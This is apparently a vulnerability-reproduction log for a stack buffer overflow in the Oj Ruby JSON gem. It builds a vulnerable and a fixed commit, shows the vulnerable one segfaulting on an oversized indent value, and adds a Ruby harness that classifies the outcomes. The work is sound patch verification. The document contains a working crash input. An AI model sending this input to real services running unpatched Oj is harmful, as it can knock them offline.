=== Oj stack buffer overflow reproduction (CVE-2026-54502) ===
ROOT=/data/pruva/runs/d11e15df-2ae7-42be-b98d-398ba7d8e0c5/bundle
SOURCE_REPO=/data/pruva/project-cache/dc167dac-a6d2-43f6-837d-84c9d571596f/repo
VULN_COMMIT=4587e87e23adc9a4163834dc8c9ba9d7206c6501
FIXED_COMMIT=ec368dbe936ef0104b782e4b0f67b17d6c7276f7
ruby 3.3.8 (2025-04-09 revision b200bad6cd) [x86_64-linux-gnu]
Updating vulnerable copy...
Updating fixed copy...
Building vulnerable at 4587e87e23adc9a4163834dc8c9ba9d7206c6501...
HEAD is now at 4587e87 Fix reentrant parser (#1013)
>>>>> Creating Makefile for ruby version 3.3.8 on x86_64-linux-gnu <<<<<
checking for rb_gc_mark_movable()... yes
checking for stpcpy()... yes
checking for pthread_mutex_init()... yes
checking for getrlimit() in sys/resource.h... yes
checking for rb_enc_interned_str()... yes
checking for rb_ext_ractor_safe() in ruby.h... yes
creating Makefile
compiling cache.c
compiling cache8.c
compiling circarray.c
compiling code.c
compiling compat.c
compiling custom.c
compiling debug.c
compiling dump.c
compiling dump_compat.c
compiling dump_leaf.c
compiling dump_object.c
compiling dump_strict.c
compiling err.c
compiling fast.c
compiling intern.c
compiling mem.c
compiling mimic_json.c
compiling object.c
compiling odd.c
compiling oj.c
oj.c: In function 'only_array_from_string':
oj.c:255:28: warning: assignment discards 'const' qualifier from pointer target type [-Wdiscarded-qualifiers]
  255 |         while (NULL != (cp = strchr(str, ':'))) {
      |                            ^
compiling parse.c
compiling parser.c
compiling rails.c
compiling reader.c
compiling resolve.c
compiling rxclass.c
compiling safe.c
compiling saj.c
compiling saj2.c
compiling scp.c
compiling sparse.c
compiling stream_writer.c
compiling strict.c
compiling string_writer.c
compiling trace.c
compiling usual.c
compiling util.c
compiling val_stack.c
compiling validate.c
compiling wab.c
linking shared-object oj/oj.so
Running vulnerable test...
/data/pruva/runs/d11e15df-2ae7-42be-b98d-398ba7d8e0c5/bundle/repro/reproduction_steps.sh: line 98:  3769 Segmentation fault      (core dumped) ruby -I"$dir/lib" -e "require 'oj'; puts Oj::VERSION; Oj.dump({a: 1}, indent: 2147483647); puts 'no crash'" > "$log" 2>&1
vulnerable exit code: 139
vulnerable: SIGSEGV observed (exit 139)
Building fixed at ec368dbe936ef0104b782e4b0f67b17d6c7276f7...
HEAD is now at ec368db Fix stack limits (#1014)
>>>>> Creating Makefile for ruby version 3.3.8 on x86_64-linux-gnu <<<<<
checking for rb_gc_mark_movable()... yes
checking for stpcpy()... yes
checking for pthread_mutex_init()... yes
checking for getrlimit() in sys/resource.h... yes
checking for rb_enc_interned_str()... yes
checking for rb_ext_ractor_safe() in ruby.h... yes
creating Makefile
compiling cache.c
compiling cache8.c
compiling circarray.c
compiling code.c
compiling compat.c
compiling custom.c
compiling debug.c
compiling dump.c
compiling dump_compat.c
compiling dump_leaf.c
compiling dump_object.c
compiling dump_strict.c
compiling err.c
compiling fast.c
compiling intern.c
compiling mem.c
compiling mimic_json.c
compiling object.c
compiling odd.c
compiling oj.c
oj.c: In function 'only_array_from_string':
oj.c:257:28: warning: assignment discards 'const' qualifier from pointer target type [-Wdiscarded-qualifiers]
  257 |         while (NULL != (cp = strchr(str, ':'))) {
      |                            ^
compiling parse.c
compiling parser.c
compiling rails.c
compiling reader.c
compiling resolve.c
compiling rxclass.c
compiling safe.c
compiling saj.c
compiling saj2.c
compiling scp.c
compiling sparse.c
compiling stream_writer.c
compiling strict.c
compiling string_writer.c
compiling trace.c
compiling usual.c
compiling util.c
compiling val_stack.c
compiling validate.c
compiling wab.c
linking shared-object oj/oj.so
Running fixed test...
fixed exit code: 1
fixed: ArgumentError (indent rejected) observed
VULN_RESULT=0
FIXED_RESULT=1
CONFIRMED: vulnerable version crashes with SIGSEGV, fixed version does not.
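The log above reduces to one probe, `Oj.dump({a: 1}, indent: 2147483647)` (2147483647 is 2**31 - 1, INT_MAX on this platform), and two exit codes: 139 from the vulnerable build, which is the shell's 128 + 11 encoding of a SIGSEGV death, and 1 from the fixed build, where the indent is rejected with an ArgumentError. The harness below is an added example, not part of the reproduction bundle or of the Oj project: it runs the same probe in a child process against a given checkout's lib directory and classifies the outcome the way reproduction_steps.sh does. The classification rules (signal number from Signal.list, the 128 + n shell convention, substring matching on stderr for ArgumentError and LoadError) are this example's own assumptions; Oj itself is only needed by the child process, so the file loads where the gem is absent.

```ruby
# Added example: reproduce and classify the CVE-2026-54502 probe from the log.
# Not the bundle's script or Oj's code; it only assumes the probe string and
# exit-code conventions visible in the log.
require 'open3'
require 'rbconfig'

# The probe exactly as the log runs it: INT_MAX (2**31 - 1) as the indent option.
INDENT = 2_147_483_647
PROBE  = "require 'oj'; puts Oj::VERSION; Oj.dump({a: 1}, indent: #{INDENT}); puts 'no crash'"

SIGSEGV = Signal.list.fetch('SEGV') # 11 on Linux

# A shell reports a child killed by signal n as exit code 128 + n, which is why
# the log shows 139 for SIGSEGV. Map such a code back to n, or nil if it is an
# ordinary exit status.
def shell_exit_to_signal(code)
  code > 128 && code < 256 ? code - 128 : nil
end

# Classify one run. Takes plain values rather than a Process::Status so the same
# logic works for numbers copied out of a log (assumption: heuristic matching).
def classify(signaled:, termsig:, exitstatus:, stderr: '')
  if signaled
    return termsig == SIGSEGV ? :vulnerable_sigsegv : :killed_by_signal
  end
  return :no_crash if exitstatus == 0
  return :vulnerable_sigsegv if shell_exit_to_signal(exitstatus) == SIGSEGV
  return :fixed_argument_error if stderr.include?('ArgumentError')
  return :oj_not_loadable if stderr.include?('LoadError')
  :unknown_failure
end

# Run the probe with the current interpreter against lib_dir (a checkout's lib/),
# or against the installed gem when lib_dir is nil.
def run_probe(lib_dir = nil)
  cmd = [RbConfig.ruby]
  cmd += ['-I', lib_dir] if lib_dir
  cmd += ['-e', PROBE]
  out, err, status = Open3.capture3(*cmd)
  verdict = classify(signaled: status.signaled?, termsig: status.termsig,
                     exitstatus: status.exitstatus, stderr: err)
  [verdict, out, err]
end

# Usage: ruby probe.rb /path/to/oj/lib   (or '-' for the installed gem)
if $PROGRAM_NAME == __FILE__ && !ARGV.empty?
  lib_dir = ARGV[0] == '-' ? nil : ARGV[0]
  verdict, out, err = run_probe(lib_dir)
  puts out
  warn err.lines.first.to_s
  puts "verdict: #{verdict}"
end
```

Pointing it at the two checkouts from the log should yield :vulnerable_sigsegv for 4587e87 and :fixed_argument_error for ec368db; :no_crash on a build that does not raise would mean the indent limit is not in place and is worth a second look rather than a pass.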